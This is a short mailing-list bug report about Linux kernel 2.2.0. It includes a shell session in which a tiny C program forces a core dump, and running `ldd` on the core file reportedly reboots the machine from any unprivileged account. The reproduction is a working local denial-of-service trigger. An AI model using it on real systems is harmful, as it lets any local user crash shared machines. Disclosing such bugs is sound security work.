[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

2.2.0 bugware




 Hi,


  As seen on Bugtraq, 2.2.0 has a really NASTY bug.

ariel@jewnix:~> cat << ENDOFILE > 1.c
void main(void)
{
     char *buf;
     sscanf(buf, "%s\n", getenv("PATH"));
}
ENDOFILE
ariel@jewnix:~> gcc -o 1 1.c
ariel@jewnix:~> ./1
Segmentation fault (core dumped)
ariel@jewnix:~> ldd ./core

PEWWFFFF !!!!

The machine reboots.

This works as any user.

:(

--Ariel

   +---------------------------------------------------------------+
   | Ariel Biener                                                  |
   | e-mail: ariel@post.tau.ac.il           Work phone: 03-6406086 |
   | fingerprint = 07 D1 E5 3E EF 6D E5 82 0B E9 21 D4 3C 7D 8B BC |
   +---------------------------------------------------------------+